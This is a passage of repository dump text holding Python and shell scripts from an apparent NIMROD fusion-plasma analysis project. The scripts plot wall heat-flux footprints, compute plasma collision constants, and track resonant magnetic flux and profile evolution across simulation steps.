(abs(r-r1)<tol) and (z>=z1)):\n '''on the first segment'''\n s=0-z\n elif (abs(z-m2*r-b2)<tol):\n# print ('slant')\n s=-z1 + m.sqrt((z-z1)**2+(r-r1)**2)\n elif ((abs(z-z3)<tol) and (r>r2-tol) and (r<r3+tol)):\n # print('bottom')\n s=-z1+l2+(r-r2)\n elif((abs(z-z4)<tol) and (r>r4-tol) and (r<r5+tol)):\n s=-z1+l2+(r3-r2)+(r-r4)\n else:\n print(\"bad point\")\n s=100\n #print(r,z,s)\n return s\n\ndef sortData(rawData,pssData):\n lastLine = -1\n numLines=0\n maxHits=1\n thisHits=0\n for ii in range(rawData.shape[0]):\n if rawData[ii,3]==lastLine:\n thisHits+=1\n if thisHits>maxHits:\n maxHits=thisHits\n else:\n lastLine=rawData[ii,3]\n numLines+=1\n thisHits=1\n# msg = \"This line \" + str(rawData[ii,3]) +\" thisHits: \" + str(thisHits)\n# print(msg)\n# print(numLines)\n# print(maxHits)\n prosData = np.zeros([numLines,maxHits,3])\n pssDict = {}\n# tempPss=np.zeros([int(np.amax(pssData[:,3])),2])\n \n lastLine = -1\n for ii in range(pssData.shape[0]):\n if int(pssData[ii,3])!=lastLine:\n lastLine=int(pssData[ii,3])\n pssDict[lastLine] = pssData[ii,2]\n\n# for physical data phi in [0,2pi] use a large phi to hide data from plot\n prosData[:,:,1]=1000.\n lastLine=-1\n lineIndex=-1\n hitIndex=-1\n for ii in range(rawData.shape[0]):\n if rawData[ii,3]==lastLine:\n hitIndex+=1\n else:\n lineIndex+=1\n hitIndex=0\n lastLine=rawData[ii,3]\n prosData[lineIndex,hitIndex,0]=rzToS(rawData[ii,0],rawData[ii,1])\n# prosData[lineIndex,hitIndex,1]=rawData[ii,2]*360/(2*np.pi)+180\n# prosData[lineIndex,hitIndex,1]=rawData[ii,2]*360/(2*np.pi)\n# Fix add 30 to be consistent\n prosData[lineIndex,hitIndex,1]=rawData[ii,2]*360/(2*np.pi)+30\n if prosData[lineIndex,hitIndex,1]>360:\n prosData[lineIndex,hitIndex,1]=prosData[lineIndex,hitIndex,1]-360\n prosData[lineIndex,hitIndex,2]=pssDict[lastLine]\n return prosData\n\nplasma_model = \"nonlinear\"\n \nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/166439/03300_vac_eq/normal_rmp_vac5_fpsep2/\"\nrelDir = \"/SCRATCH/166439/03300_2_equilbria/19091201_vac_lphi5_fp/\"\nrelDir = \"/SCRATCH/166439/03300_2_fl//19091702/lphi5_nolinear_restart/58000/\"\n#relDir = \"/SCRATCH/166439/03300_2_equilbria/19091702_fl/linear/lphi5_2/50000/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/\" +dump_num +\"/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_restart/\" +dump_num +\"/\"\n#relDir = \"/SCRATCH/166439/03300/normal_rmp_vac5_fpsep2/\"\n#relDir = \"/SCRATCH/166439/03300_vac_eq/complexconj_rmp_vac_fpsep2/\"\nfileName = \"surfcross0058000.txt\"\npssFileName = \"nimfl0058000.dat\"\n#fileName = \"surfcross0110000.txt\"\n#pssFileName = \"nimfl0110000.dat\"\n\n\nif plasma_model == \"vacuum\":\n plotTitle = \"Vacuum Response Footprint\"\n relDir = \"/SCRATCH/166439/03300_2_equilbria/19091201_vac_lphi5_fp_deg50/\"\n dump_num = \"00100\"\nelif plasma_model == \"linear\":\n plotTitle = \"Linear Response Footprint\"\n relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/200000_50deg/\"\n dump_num=\"200000\"\nelif plasma_model ==\"nonlinear\":\n plotTitle = \"Nonlinear Response Footprint\"\n relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_fresh/32000/\"\n dump_num = \"32000\"\nelse:\n plotTitle = \"Vacuum Response Footprint\"\n dump_num=\"58000\" \n\nif len(dump_num)==6:\n fileName = \"surfcross0\"+dump_num+\".txt\"\n pssFileName = \"nimfl0\"+dump_num+\".dat\"\nelif len(dump_num)==5:\n fileName = \"surfcross00\"+dump_num+\".txt\"\n pssFileName = \"nimfl00\"+dump_num+\".dat\"\n\n#fileName = \"surfcross0000100.txt\"\n#pssFileName = \"nimfl0000100.dat\"\nfullFileName = homeDir+relDir+fileName\npssFullFileName = homeDir+relDir+pssFileName\n\npltt0=0.\nplttf=360.\nplts0=1.15\npltsf=1.3\nminLength=70.\nvMax=1e5\nrawData = np.loadtxt(fullFileName)\npssData = np.loadtxt(pssFullFileName)\nprosData = sortData(rawData,pssData)\n\n\nfor ii in range(prosData.shape[0]):\n if prosData[ii,0,2]<minLength: continue\n plt.scatter(prosData[ii,:,1],prosData[ii,:,0],c=np.log10(prosData[ii,:,2]),cmap='prism',vmin=np.log10(minLength),vmax=np.log10(vMax),s=1)\nplt.vlines(80,plts0,pltsf,linestyles='dotted',linewidths=1)\nplt.hlines(1.285,0,360,linestyles='-.',linewidths=1)\nplt.text(150,1.2875, \"Inner strike point\",fontsize=12)\nplt.axis([pltt0,plttf,plts0,pltsf])\nplt.xlabel('Toroidal Angle (deg)')\nplt.ylabel('Distance along wall (m)')\nplt.title(plotTitle)\nplt.show()\n\n\n#print(prosData)\n#print(fullFileName)\n" }, { "alpha_fraction": 0.5067501664161682, "alphanum_fraction": 0.5130111575126648, "avg_line_length": 34.24827575683594, "blob_id": "88c0920e103ef3bbec56d1923b6caa1ef2f7b2e9", "content_id": "4bbf87b3aad17f496a1939972c3d9ff122bced30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5111, "license_type": "no_license", "max_line_length": 93, "num_lines": 145, "path": "/hocradic/hcMult.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport hcStep as step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\nimport sys\n\ndef pickle_sort(file):\n print(file[5:])\n return int(file.split[0][5:])\n\ndef find_files(thisdir):\n ''' This fuction finds the hc, dump files in the directory\n input: thisdir\n output: hc filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n dumpfile=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll' and wordlist[-1]=='h5'):\n if (dumpfile==None):\n dumpfile=iobj\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=iobj\n\n return dumpfile, nimrodin\n\ndef hcmult(args):\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_suf=[\"pickle\"]\n pickle_pre=[\"power\",\"poweradv\"]\n steplist = []\n read_new = True\n if args['merge']:\n pickle_list=glob.glob(\"power.*\")\n if len(pickle_list)>0:\n for iobj in pickle_list:\n this=step.hcstep(None,None)\n this.load(iobj)\n advpickle=pickle_pre[1]+'.'+str(this.step).zfill(5)+ \\\n '.'+pickle_suf[0]\n print(this.step,advpickle)\n try:\n this2=step.hcstep(None,None)\n this2.load(advpickle)\n for key, field in this2.powerDict.items():\n print(key)\n if key not in this.powerDict:\n print(f\"adding key {key} to power dict\")\n this.powerDict[key]=field\n print(\"Found file\")\n if args['pickle']:\n print(f\"writing file {iobj}\")\n with open(iobj,'wb') as file:\n this.dump(file)\n print('pickle')\n except:\n print(\"File not found\")\n sys.exit(0)\n if args['read']:\n pickle_list=glob.glob(\"power.*\")\n pickle_list.sort(key=pickle_sort)\n if len(pickle_list)>0:\n read_new=False\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n this=step.hcstep(None,None)\n this.load(file)\n steplist.append(this)\n if read_new==True:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj\n dump, nimrodin = find_files(thisdir)\n if dump == None:\n continue\n try:\n os.mkdir('tempdir')\n except:\n print(\"tempdir exists\")\n copy2(thisdir + '/' + dump,'./tempdir')\n copy2('nimrod.in','./tempdir')\n os.chdir('tempdir')\n this=step.hcstep(dump,nimrodin)\n this.get_dumptime()\n if args['mode']==0:\n this.analyze_power(npts=args['npts'])\n this.analyze_power_adv(npts=args['npts'])\n elif args['mode']==1:\n this.analyze_power_adv(npts=args['npts'])\n else:\n print(f\"mode {args['mode']} is not valid\")\n raise ValueError\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempdir')\n this.print_integrals()\n steplist.append(this)\n if args['pickle']:\n pfile=pickle_pre[args['mode']]+'.'+str(this.step).zfill(5)+ \\\n '.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n this.dump(file)\n this.clean_up()\n for this in steplist:\n this.print_integrals()\n nimtime.timer.print_times()\n print(this.step, this.time)\n #plot data here\n if args['plot']:\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ho-Cradick runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n parser.add_argument('--npts', '-n', type=int, default=512,help='number of points in 1D')\n parser.add_argument('--mode', '-m', type=int, default=0,help='0 standard, 1 advect ')\n parser.add_argument('--merge', action='store_true', help='copy advection to power dict ')\n args = vars(parser.parse_args())\n print(args)\n hcmult(args=args)\n" }, { "alpha_fraction": 0.5026423931121826, "alphanum_fraction": 0.6335877776145935, "avg_line_length": 27.88135528564453, "blob_id": "cd6c182c317ee982d5c6f70a748289a722cf4965", "content_id": "eb39724774fa396d8bdc04c47701987a949a00c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1703, "license_type": "no_license", "max_line_length": 78, "num_lines": 59, "path": "/transport_calculator/plasma_constants.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nme = 9.1093898e-31\nmd = 3.3435860e-27\nqe = 1.60217733e-19\nmu0 = 4 * np.pi * 1e-7\ngamma = 5./3.\nkboltz = 1.60217733e-19\nclight = 2.99792458e8\neps0 = 8.854187817e-12\n \ndef coulombLog(te, ne):\n# logLam = 18.4 - 1.15 * np.log10(ne)+2.3*np.log10(te)\n# Jim Callen uses 17\n logLam = 24 - np.log(np.sqrt(ne*1.e-6)/te)\n return logLam\n\ndef nu_e(ne,te,zeff,logLam):\n nu = np.sqrt(2*np.pi)* ne * zeff * qe**4 * logLam\n nu *= 1.0/(12.0*(np.pi * eps0)**2 * np.sqrt(me) * np.power(kboltz*te,1.5))\n return nu\n\ndef nu_i(ni,ti,mi,zstar,logLam):\n nu = np.sqrt(np.pi)* ni* (1.0+np.sqrt(2.0)*zstar) * qe**4 * logLam\n nu *= 1.0/(12.0*(np.pi * eps0)**2 * np.sqrt(mi) * np.power(kboltz*ti,1.5))\n return nu\n\ndef vte(te):\n return np.sqrt(2*kboltz*te/me)\n\ndef vts(ts,ms):\n return np.sqrt(2*kboltz*ts/ms)\n\ndef zStar(ne,ni,zeff):\n return (ne/ni)*zeff-1.0\n\ndef circulatingFraction(eps):\n return 1-1.46*np.sqrt(eps) + 0.46 * np.power(eps,1.5)\n\ndef nuBanana(nu,eps):\n return np.sqrt(eps)*nu\n\ndef nuStar(R0,q0,epsilon,lam):\n return R0*q0/(np.power(epsilon,1.5)*lam)\n\ndef neoMue(nue,nueStar,zeff,eps):\n numer = 1.46 * np.sqrt(eps) * (1.+0.533/zeff)*nue\n denomFac = (2.4*zeff**2+5.32*zeff+2.225)/(4.25*zeff**2+3.02*zeff)\n denom = (1.+np.sqrt(nueStar)+1.65*(1.+0.533/zeff)*nueStar)\n denom *= (1+1.18*denomFac*np.power(eps,1.5)*nueStar)\n return numer/denom\n\ndef neoMui(nu,nuStar,zStar,eps):\n numer = 1.46 * np.sqrt(eps) * (zStar+0.533)/(zStar+0.707)*nu\n denomFac = (2.4*zStar**2+5.32*zStar+2.225)/((zStar+0.707)*(4.25*zStar+3.02))\n denom = (1.+np.sqrt(nuStar)+1.65*(zStar+0.533)/(zStar+0.707)*nuStar)\n denom *= (1+1.18*denomFac*np.power(eps,1.5)*nuStar)\n return numer/denom" }, { "alpha_fraction": 0.6864407062530518, "alphanum_fraction": 0.7203390002250671, "avg_line_length": 58, "blob_id": "963b5676d871c241198ceb82b992e57734b4c94a", "content_id": "4bd28509d4c217c6112ab14d82303d9275a6518b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 118, "license_type": "no_license", "max_line_length": 107, "num_lines": 2, "path": "/bilderScripts/run_bilder.sh", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/bin/sh\n./mknimall.sh -d -j4 -t -m darwin.gcc820 -i /home/research/ehowell/SCRATCH/nimall/SOFTWARE -E USE_MPI=mpich\n" }, { "alpha_fraction": 0.5717322826385498, "alphanum_fraction": 0.6334426403045654, "avg_line_length": 35.105262756347656, "blob_id": "5b5db04a8dbb9ede22760e4b3993e83e3899bcf8", "content_id": "0615122a2f97e4aea0d2da2e96c86fd186b879d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16464, "license_type": "no_license", "max_line_length": 119, "num_lines": 456, "path": "/surfmn/surfmn_runner_03.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\nimport surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\n\n''' This is a generic runner for surfmn. It loops over a bunch of directorys\nin the current directory, searchs for a surfmn file, and a dump file. If the\ndump file exists, then record the time. If not only record step number. It\nthen calls surfmn routines to plot the data and record the reconnected flux'''\n\ndef pickle_sort(file):\n print(file[6:])\n return int(file[6:])\n\ndef get_dumptime(thisfile):\n ''' Open an hdf5 file and read the dump time\n if I can't open file return None\n '''\n time=None\n with h5py.File(thisfile, 'r') as h5file:\n try:\n time=h5file[\"dumpTime\"].attrs['vsTime']\n except:\n print(f\"No dumpTime in dumpfile {thisfile}\")\n raise\n return time\n\ndef find_files(thisdir):\n ''' This fuction finds the surfmn, dump files in the directory\n input: thisdir\n output: surfmn filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n surfmn_file=None\n dumpfile=None\n stepnumber=None\n steptime=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll'):\n if (dumpfile==None):\n dumpfile=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Dump step does not match surfmn step\")\n raise\n steptime=get_dumptime(dumpfile)\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (wordlist[0].lower()=='surfmn'):\n if (surfmn_file==None):\n surfmn_file=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Surfmn step does not match dump step\")\n raise\n else:\n print(f\"Multiple surfmn files in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=thisdir+'/'+iobj\n\n\n return surfmn_file, dumpfile, stepnumber, steptime, nimrodin\n\ndef time_hist(steplist):\n print(len(steplist))\n time=np.zeros(len(steplist))\n psi21=np.zeros(len(steplist))\n psi31=np.zeros(len(steplist))\n psi41=np.zeros(len(steplist))\n psi32=np.zeros(len(steplist))\n psi43=np.zeros(len(steplist))\n psi54=np.zeros(len(steplist))\n psi65=np.zeros(len(steplist))\n exb21=np.zeros(len(steplist))\n exb31=np.zeros(len(steplist))\n exb32=np.zeros(len(steplist))\n exb43=np.zeros(len(steplist))\n pressure_profiles=[]\n rho_profiles=[]\n jpar_profiles=[]\n q_profiles=[]\n times=[]\n mlist=[-1,-2,-3,-4]\n qlist=[-1,-2,-3,-4]\n for istep,step in enumerate(steplist):\n print(istep,step.step, step.time)\n time[istep]=step.time\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n# fig = plt.figure(figsize=(6,5))\n# ax=fig.add_subplot(111)\n# plt.plot(step.profs.rhon,step.profs.omegator)\n# plt.title(r\"fsa\",fontsize=16)\n# plt.ylabel(r'nd ',fontsize=16)\n# plt.xlabel(r'rho',fontsize=16)\n# plt.tight_layout()\n# plt.show()\n psi21[istep]=step.get_resonance(\"psi\",1,-2)\n psi31[istep]=step.get_resonance(\"psi\",1,-3)\n psi41[istep]=step.get_resonance(\"psi\",1,-4)\n psi43[istep]=step.get_resonance(\"psi\",3,-4)\n psi32[istep]=step.get_resonance(\"psi\",2,-3)\n psi54[istep]=step.get_resonance(\"psi\",4,-5)\n psi65[istep]=step.get_resonance(\"psi\",5,-6)\n this_q=step.profs.get_rho_q(q=-2)\n exb21[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-3)\n exb31[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n #this_q=step.profs.get_rho_q(q=-1.5)\n #exb32[istep]=step.profs.get_omega_exb(n=2,rhon=this_q)/(2*np.pi)\n #this_q=step.profs.get_rho_q(q=-4/3)\n #exb43[istep]=step.profs.get_omega_exb(n=3,rhon=this_q)/(2*np.pi)\n if step.step==00000:\n print(step.mr.shape,step.q.shape)\n eq_q2 = step.profs.get_rho_q(q=-2)\n eq_q3 = step.profs.get_rho_q(q=-3)\n eq_q65 = step.profs.get_rho_q(q=-1.2)\n eq_q54 = step.profs.get_rho_q(q=-1.25)\n eq_q43 = step.profs.get_rho_q(q=-4./3.)\n eq_q32 = step.profs.get_rho_q(q=-3./2.)\n\n\n\n if step.step in [00000]:\n times.append(step.time)\n rho_profiles.append(step.profs.rhon)\n q_profiles.append(-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n pressure_profiles.append(step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon))\n jpar_profiles.append(step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon))\n fig=plt.figure(figsize=(8,8))\n ax=fig.add_subplot(311)\n plt.plot(step.profs.rhon,-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n plt.title(r\"Safety factor\",fontsize=16)\n plt.ylabel(r'|q|',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(312)\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon),color='b')\n plt.title(r\"Current Profile\",fontsize=16)\n plt.ylabel(r'$J_\\parallel$ $[MA/m^2]$',fontsize=16,color='b')\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax2=ax.twinx()\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon),color='r')\n ax2.set_ylabel('p [kpa]', color='r')\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(313)\n plt.plot(step.profs.rhon,1.0*step.profs.get_field_rho(step.profs.omegator,step.profs.rhon)/1000)\n plt.title(r\"Rotation Profile\",fontsize=16)\n plt.ylabel(r'$\\omega$ $[krads/s]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.ylim(0.0,32)\n ax.axvline(eq_q2,ls=':')\n plt.tight_layout()\n plt.show()\n\n fig=plt.figure(figsize=(8,8))\n ax=fig.add_subplot(311)\n plt.plot(step.profs.rhon,-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n plt.title(r\"Safety factor\",fontsize=16)\n plt.ylabel(r'|q|',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(312)\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon))\n plt.title(r\"Current Profile\",fontsize=16)\n plt.ylabel(r'$|J_\\parallel|$ $[MA/m^2]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(313)\n plt.plot(step.profs.rhon,step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon))\n ax.set_ylabel('p [kpa]',fontsize=16)\n plt.title(r\"Pressure Profile\",fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n ax.axvline(eq_q2,ls=':')\n plt.tight_layout()\n plt.show()\n\n fig=plt.figure(figsize=(8,6))\n ax=fig.add_subplot(211)\n plt.plot(step.profs.rhon,step.profs.get_omega_exb(n=1)/1000)\n plt.title(r\"ExB Rotation Profile\",fontsize=16)\n plt.ylabel(r'$\\Omega$ $[krad/s]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n #plt.ylim(0.0,)\n ax.axvline(eq_q2,ls=':')\n ax=fig.add_subplot(212)\n plt.plot(step.profs.rhon,1.0*step.profs.get_field_rho(step.profs.kpol,step.profs.rhon)/1000)\n plt.title(r\"Poloidal Rotation Profile\",fontsize=16)\n plt.ylabel(r'$K_{pol}$ $[km/Ts]$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n #plt.ylim(0.0,32)\n ax.axvline(eq_q2,ls=':')\n plt.tight_layout()\n plt.show()\n\n if step.step in [54000,78000,102000,300000,320000]:\n times.append(step.time)\n rho_profiles.append(step.profs.rhon)\n pressure_profiles.append(step.profs.get_field_rho(step.profs.p/1000,step.profs.rhon))\n jpar_profiles.append(step.profs.get_field_rho(step.profs.jpar/-1000000,step.profs.rhon))\n q_profiles.append(-1.0*step.profs.get_field_rho(step.profs.q,step.profs.rhon))\n\n if step.step ==10000:#[10000,18680,28000,66000,96000]:\n rargs={}\n rargs[\"scale\"]=1000\n rargs[\"qlist\"]=qlist\n rargs[\"figsize\"]=(9,7.5)\n rargs[\"ylabel\"]=r\"$\\psi$ [mWb]\"\n rargs[\"title\"]=\"n=1 spectrum at peak pulse\"\n\n# if step.time>0: #avoids issues if no pertubation\n this_exb=step.profs.get_omega_exb(n=1)\n this_rho_21=step.profs.get_rho_q(q=-2)\n# fig = plt.figure(figsize=(6,5))\n# ax=fig.add_subplot(111)\n# plt.plot(step.profs.rhon,this_exb/(2*np.pi))\n# plt.title(r\"fsa\",fontsize=16)\n# plt.ylabel(r'f_exb ',fontsize=16)\n# plt.xlabel(r'rho',fontsize=16)\n# ax.axvline(this_rho_21,ls=':')\n# plt.tight_layout()\n# plt.show()\n step.plot_surfmn(\"psi\",1,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",2,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",3,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",4,**{\"scale\":1000})\n# step.plot_surfmn(\"psi\",5,**{\"scale\":1000})\n# step.plot_radial(\"psi\",1,mlist,**{\"scale\":1000,\"qlist\":qlist,\"figsize\":(9,7.5),\"ylabel\":r\"$\\psi$ [mWb]\",\"title\":\n# \"n=1 at peak pulse\"})\n step.plot_radial(\"psi\",1,mlist,**rargs)\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n for (this_rhon, this_p, this_time,index) in zip(rho_profiles,pressure_profiles,times,range(0,4)):\n if index==1:\n ls='-.'\n else:\n ls='-'\n plt.plot(this_rhon, this_p,ls=ls, label=\"{:2.1f} ms\".format(this_time*1000))\n ax.axvline(eq_q2 ,ls=':',label=\"q=2/1\",color='r')\n ax.axvline(eq_q32,ls=':',label=\"q=3/2\",color='b')\n ax.axvline(eq_q43,ls=':',label=\"q=4/3\",color='g')\n ax.axvline(eq_q54,ls=':',label=\"q=5/4\",color='y')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"Pressure Profile Evolution\",fontsize=16)\n plt.ylabel(r'$p$ [kPa] ',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n for (this_rhon, this_j, this_time,index) in zip(rho_profiles,jpar_profiles,times,range(0,4)):\n if index==1:\n ls=':'\n else:\n ls='-'\n plt.plot(this_rhon, this_j, label=\"{:2.1f} ms\".format(this_time*1000))\n ax.axvline(eq_q2 ,ls=':',label=\"q=2/1\",color='r')\n ax.axvline(eq_q32,ls=':',label=\"q=3/2\",color='b')\n ax.axvline(eq_q43,ls=':',label=\"q=4/3\",color='g')\n ax.axvline(eq_q54,ls=':',label=\"q=5/4\",color='y')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"Parallel Current\",fontsize=16)\n plt.ylabel(r'$J_\\parallel$ [$MA/m^2$] ',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n for (this_rhon, this_q, this_time,index) in zip(rho_profiles,q_profiles,times,range(0,4)):\n if index==1:\n ls=':'\n else:\n ls='-'\n plt.plot(this_rhon, this_q, ls=ls,label=\"{:3.2f} ms\".format(this_time*1000))\n ax.legend(loc=0)\n ax.axvline(eq_q2,ls=':')\n ax.axvline(eq_q65,ls=':')\n ax.axvline(eq_q54,ls=':')\n ax.axvline(eq_q43,ls=':')\n ax.axvline(eq_q32,ls=':')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"Safety Factor\",fontsize=16)\n plt.ylabel(r'$q$',fontsize=16)\n plt.xlabel(r'$\\rho_N$',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n ax.axvline(1.7841168247219863,ls=':',color='k')\n ax.axvline(5.000303824828437,ls=':',color='k')\n ax.fill([0,1.0,1.0,0],[0,0,35,35],'gray',alpha=0.2)\n plt.ylim(0,35)\n plt.title(r\"$\\psi$ 2/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi31*1000)\n ax.axvline(1.7841168247219863,ls=':',color='k')\n ax.axvline(5.000303824828437,ls=':',color='k')\n ax.fill([0,1.0,1.0,0],[0,0,45,45],'gray',alpha=0.2)\n plt.ylim(0,45)\n plt.title(r\"$\\psi$ 3/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n if False:\n #[0,0.5413792981815724,2.969027824826107,5.000303824828437\n #10.056996153823189,14.987410824789972\n time_slice=14.987410824789972\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n ax.axvline(time_slice,ls='-',color='k')\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,np.abs(exb43)/1000)\n plt.plot(time*1000,np.abs(exb32)/1000)\n plt.plot(time*1000,np.abs(exb31)/1000)\n plt.plot(time*1000,np.abs(exb21)/1000)\n plt.title(r\"$f_{eb}$ \",fontsize=16)\n plt.ylabel(r'f [kHz] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n# for istep in steplist:\n\ndef surfmn_runner(show_plot=True,pickle_data=False,read_pickle=False):\n ''' main runner for surfmn\n loops over all objects in a directory\n checks to see if the objects are a directory\n if so, then searches that directoy for a dump file and surfmn file'''\n steplist=[]\n 